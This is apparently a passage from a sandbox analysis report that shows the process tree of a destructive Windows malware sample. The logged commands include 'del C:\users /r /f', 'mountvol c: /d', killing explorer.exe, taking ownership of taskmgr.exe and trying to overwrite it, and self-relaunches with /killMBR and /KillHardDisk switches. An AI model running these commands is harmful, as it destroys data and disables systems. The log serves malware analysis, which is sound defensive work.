  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe 1697996445
  2⤵
  PID:5664
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe 1697996445
    3⤵
    PID:10336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
      4⤵
      PID:8060
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:10028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /autoup 1697996445
      4⤵
      PID:8380
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /autoup 1697996445
        5⤵
        
        PID:8940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /killwindows 1697996445
      4⤵
      PID:7032
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /killwindows 1697996445
        5⤵
        
        PID:3880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /KillHardDisk 1697996445
      4⤵
      PID:9652
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /KillHardDisk 1697996445
        5⤵
        
        PID:7176
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        6⤵
        
        PID:12036
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        6⤵
        
        PID:6860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /killMBR 1697996445
      4⤵
      PID:4924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /protect 1697996445
      4⤵
      PID:12200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe C:\windows\system32\taskmgr.exe
      4⤵
      PID:9016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /autoup 1697996445
      4⤵
      PID:7492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe+38555.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe
  2⤵
  PID:11144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe 1697996445
  2⤵
  PID:10816
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe 1697996445
    3⤵
    PID:10096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
      4⤵
      PID:8260
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:7412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /autoup 1697996445
      4⤵
      PID:7288
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /autoup 1697996445
        5⤵
        
        PID:9172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /killwindows 1697996445
      4⤵
      PID:9792
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /killwindows 1697996445
        5⤵
        
        PID:4340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /KillHardDisk 1697996445
      4⤵
      PID:10252
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /killMBR 1697996445
      4⤵
      PID:7200

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /save 1697996445
1⤵
- Executes dropped EXE
PID:6056

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe /protect 1697996445
1⤵
- Executes dropped EXE
PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe+432551.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe
  2⤵
  PID:6428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe 1697996445
  2⤵
  PID:9528
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe 1697996445
    3⤵
    PID:10564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
      4⤵
      PID:3396
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:1160
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe /autoup 1697996445
      4⤵
      PID:9016
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe /autoup 1697996445
        5⤵
        
        PID:5692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe /killwindows 1697996445
      4⤵
      PID:10000
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe /killwindows 1697996445
        5⤵
        
        PID:9652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe /KillHardDisk 1697996445
      4⤵
      PID:9252
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe /KillHardDisk 1697996445
        5⤵
        
        PID:11684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0514.exe /killMBR 1697996445
      4⤵
      PID:8636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe+38555.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0513.exe
  2⤵
  PID:8700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0513.exe 1697996445
  2⤵
  PID:9804
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0513.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0513.exe 1697996445
    3⤵
    PID:1804
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
      4⤵
      PID:10116
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:11908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0513.exe /autoup 1697996445
      4⤵
      PID:9268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe+432551.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d044.exe
1⤵
PID:6496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe+432551.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0184.exe
1⤵
PID:6480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe+432551.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
1⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe 1697996445
1⤵
- Executes dropped EXE
PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /protect 1697996445
  2⤵
  PID:6984
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /protect 1697996445
    3⤵
    - Executes dropped EXE
    PID:3960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe+78963.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0547.exe
      4⤵
      PID:7348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0547.exe 1697996445
      4⤵
      PID:6416
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0547.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0547.exe 1697996445
        5⤵
        
        PID:3492
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:7460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:10516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe+515054.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0545.exe
      4⤵
      PID:9232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0545.exe 1697996445
      4⤵
      PID:2364
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0545.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0545.exe 1697996445
        5⤵
        
        PID:1796
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:9780
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:9768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /save 1697996445
  2⤵
  PID:7800
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /save 1697996445
    3⤵
    - Executes dropped EXE
    PID:9284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:8016
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:9420

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe 1697996445
1⤵
- Executes dropped EXE
PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe /protect 1697996445
  2⤵
  PID:6960
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe /protect 1697996445
    3⤵
    - Executes dropped EXE
    PID:7484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe+67395.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0646.exe
      4⤵
      PID:9448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0646.exe 1697996445
      4⤵
      PID:9244
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0646.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0646.exe 1697996445
        5⤵
        
        PID:10468
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6484
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:3552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe+217627.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0642.exe
      4⤵
      PID:1012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0642.exe 1697996445
      4⤵
      PID:8540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe /save 1697996445
  2⤵
  PID:6292
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d064.exe /save 1697996445
    3⤵
    PID:10476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:6432
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:10208

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe 1697996445
1⤵
- Executes dropped EXE
PID:316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /protect 1697996445
  2⤵
  PID:6912
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /protect 1697996445
    3⤵
    - Executes dropped EXE
    PID:5268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe+67395.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d026.exe
      4⤵
      PID:9504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d026.exe 1697996445
      4⤵
      PID:1684
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d026.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d026.exe 1697996445
        5⤵
        
        PID:2244
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:10092
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:4784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe+217627.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d022.exe
      4⤵
      PID:6284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d022.exe 1697996445
      4⤵
      PID:5952
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d068.exe /autoup 1697996445
        5⤵
        
        PID:3996
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d022.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d022.exe 1697996445
        5⤵
        
        PID:8436
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:12200
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d022.exe /autoup 1697996445
        6⤵
        
        PID:2996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /save 1697996445
  2⤵
  PID:8356
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /save 1697996445
    3⤵
    - Executes dropped EXE
    PID:10164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:10928
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:6292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /autoup 1697996445
  2⤵
  PID:5404
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /autoup 1697996445
    3⤵
    PID:9892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /killwindows 1697996445
  2⤵
  PID:4084
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /killwindows 1697996445
    3⤵
    PID:6832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:11864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /KillHardDisk 1697996445
  2⤵
  PID:9624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /killMBR 1697996445
  2⤵
  PID:8448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /protect 1697996445
  2⤵
  PID:10996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe /autoup 1697996445
  2⤵
  PID:11188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d02.exe C:\windows\system32\taskmgr.exe
  2⤵
  PID:8820

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
PID:1968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffdded59758,0x7ffdded59768,0x7ffdded59778
  2⤵
  PID:7036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=1896,i,1164431591824464012,5037876020552774790,131072 /prefetch:2
  2⤵
  PID:8748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1896,i,1164431591824464012,5037876020552774790,131072 /prefetch:8
  2⤵
  PID:5812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdded59758,0x7ffdded59768,0x7ffdded59778
  2⤵
  PID:5588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1868,i,13690019235715863,6174913654255548179,131072 /prefetch:8
  2⤵
  PID:7624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 --field-trial-handle=1868,i,13690019235715863,6174913654255548179,131072 /prefetch:8
  2⤵
  PID:8292
- C:\Program Files\Google\Chrome\Application\chrome.exe
